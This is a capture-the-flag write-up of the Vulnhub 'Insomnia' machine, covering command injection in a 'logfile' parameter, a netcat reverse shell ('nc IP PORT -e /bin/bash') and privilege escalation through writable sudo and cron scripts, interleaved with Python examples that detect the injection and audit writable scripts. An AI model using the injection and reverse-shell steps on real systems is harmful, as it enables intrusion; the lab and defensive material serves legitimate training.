Insomnia Vulnhub Writeup (First blood)

Difficulty: Easy/Medium (In my opinion)

NMAP:

Nice port 8080 is open, so let’s browse

As we can see there is a chat, but we can’t do anything with it, so we use dirb to brute-force directories.

DIRB:

OK, we found the directory “administration.php” and a few others, but those are rabbit holes, so let’s browse this one.

Nice, “Your activity has been logged”, but we can do nothing here, so let’s fuzz some parameters.

ARJUN:

We found the parameter “logfile”, so can we do an LFI? Mmmh, no! That doesn’t work, but we can do command injection, and the result appears directly in the chat!

COMMAND INJECTION:

And

Some files will appear! Nice, we notice that “chat.txt” can execute commands, so

And

Wow! www-data, so let’s go for the reverse shell!

Command: chat.txt; nc IP PORT -e /bin/bash (start your listener first!)
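The injection in the “logfile” parameter, seen from the defender’s side, as an added Python example (not code from the original writeup or from the box): a detector that flags shell metacharacters in the logfile value of access-log lines, next to the allowlist lookup a hardened administration.php would use instead of handing the value to a shell. The access-log lines, the allowed log names and the /var/log/app directory are constructed for this example and are not taken from the machine.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that never belong in a log-file name (example list).
SHELL_META = re.compile(r"[;&|`$<>\n\\(){}]")

# Names the page is allowed to serve; assumed for this example.
ALLOWED_LOGS = {"chat.txt", "access.log"}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Constructed access-log lines: a normal request, an injection attempt and
# an unrelated page (not captured from the box).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Jan/2022:10:00:01 +0000] "GET /administration.php?logfile=chat.txt HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Jan/2022:10:00:07 +0000] "GET /administration.php?logfile=chat.txt%3Bid HTTP/1.1" 200 640',
    '10.0.0.5 - - [10/Jan/2022:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 1024',
]


def suspicious_logfile_values(line):
    """Return the 'logfile' values in one access-log line that carry shell
    metacharacters (parse_qs URL-decodes them), or [] if the line is clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    return [v for v in query.get("logfile", []) if SHELL_META.search(v)]


def scan_access_log(lines):
    """Detection: (line index, offending value) for every flagged request."""
    return [(i, v) for i, line in enumerate(lines)
            for v in suspicious_logfile_values(line)]


def resolve_logfile(value, log_dir="/var/log/app"):
    """Mitigation: the parameter is only compared against an allowlist and
    joined to a fixed directory; it is never passed to a shell, so
    metacharacters have nothing to act on. Raises ValueError otherwise."""
    if value not in ALLOWED_LOGS:
        raise ValueError("logfile not permitted: %r" % value)
    return os.path.join(log_dir, value)


if __name__ == "__main__":
    for idx, value in scan_access_log(SAMPLE_ACCESS_LOG):
        print("line %d: suspicious logfile=%r" % (idx, value))
```

The detector is deliberately narrow (one parameter, a fixed metacharacter set) so it stays cheap to run over a whole log; the real fix is resolve_logfile, which removes the shell from the code path altogether rather than trying to filter what reaches it.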

HORIZONTAL PRIVILEGE ESCALATION:

sudo -l

Nice, “start.sh” runs with user “julia” privileges, so add /bin/bash to that script.

Nice!!!

VERTICAL PRIVILEGE ESCALATION:

Initially we do not notice anything interesting, but if we look in /etc/crontab we notice a file that keeps running on the system, so we can exploit it.

For convenience I use pspy64, which shows me the processes running on the system, to understand how often it is executed.

Now put pspy64 on the target in the /tmp directory, make it executable with “chmod +x pspy64” and run it with ./pspy64

And run now!

As we can see, every 1 minute the “check.sh” script runs, and we also notice that it is a writable file! So let’s add our reverse-shell payload to it.
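Both escalation steps rest on the same misconfiguration: a script executed with higher privileges (by sudo as julia, by root’s cron every minute) is writable by a lower-privileged account. The following audit is an added Python example, not code from the writeup or the box: it parses sudo -l and /etc/crontab style text and flags any script path in a command that is group- or world-writable. The sudo -l output, the crontab lines, the script names and their modes are constructed in a temporary directory for the example; only start.sh and check.sh echo the writeup.

```python
import os
import re
import stat
import tempfile

# A path-like token inside a command string (example heuristic).
PATH_RE = re.compile(r"(?<!\S)(/[^\s;&|]+)")


def loosely_writable(path):
    """True when `path` exists and is group- or world-writable: a low-privilege
    account could then rewrite a script that a privileged account executes."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_sudo_rules(sudo_l_output):
    """Parse 'sudo -l' style lines '(runas) [NOPASSWD:] command' and flag
    writable paths inside the command."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = re.match(r"\s*\((\S+)\)\s+(?:NOPASSWD:\s*)?(.+)$", line)
        if not m:
            continue
        runas, command = m.groups()
        findings += [("sudo", runas, p) for p in PATH_RE.findall(command)
                     if loosely_writable(p)]
    return findings


def audit_system_crontab(crontab_text):
    """Parse /etc/crontab style lines 'm h dom mon dow user command' and flag
    writable paths inside the command; comments and VAR=value lines skipped."""
    findings = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[0].startswith("#") or "=" in fields[0]:
            continue
        user, command = fields[5], fields[6]
        findings += [("cron", user, p) for p in PATH_RE.findall(command)
                     if loosely_writable(p)]
    return findings


def demo():
    """Constructed scenario in a temp dir: start.sh (sudo target) and check.sh
    (root cron, every minute) are writable by everyone, like the two scripts
    in the writeup; backup.sh is a hypothetical 0755 control that stays clean."""
    d = tempfile.mkdtemp()
    scripts = {}
    for name, mode in (("start.sh", 0o777), ("check.sh", 0o777), ("backup.sh", 0o755)):
        p = os.path.join(d, name)
        with open(p, "w") as f:
            f.write("#!/bin/bash\necho ok\n")
        os.chmod(p, mode)
        scripts[name] = p
    # Constructed sudo -l and crontab text; hostname and times are made up.
    sudo_l = ("User www-data may run the following commands on insomnia:\n"
              "    (julia) NOPASSWD: /bin/bash %s\n" % scripts["start.sh"])
    crontab = ("SHELL=/bin/sh\n"
               "# m h dom mon dow user command\n"
               "* * * * * root %s\n"
               "0 3 * * * root /bin/sh %s\n" % (scripts["check.sh"], scripts["backup.sh"]))
    return audit_sudo_rules(sudo_l) + audit_system_crontab(crontab)


if __name__ == "__main__":
    for source, who, path in demo():
        print("%s: %s runs %s, which is group/world-writable" % (source, who, path))
```

Run as a scheduled check it catches exactly the two conditions the writeup abuses; the remediation is the same in both cases, chmod 755 plus root ownership on anything a privileged account executes, and a sudo rule that names a fixed binary rather than a script a web user can edit.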

Just wait and listen on port 4444, and…..

WE ARE ROOT!

Thank you everyone, I hope this is useful!

-0xJin


| eCPTX | C|EH Master | CompTIA Security + | eJPT |
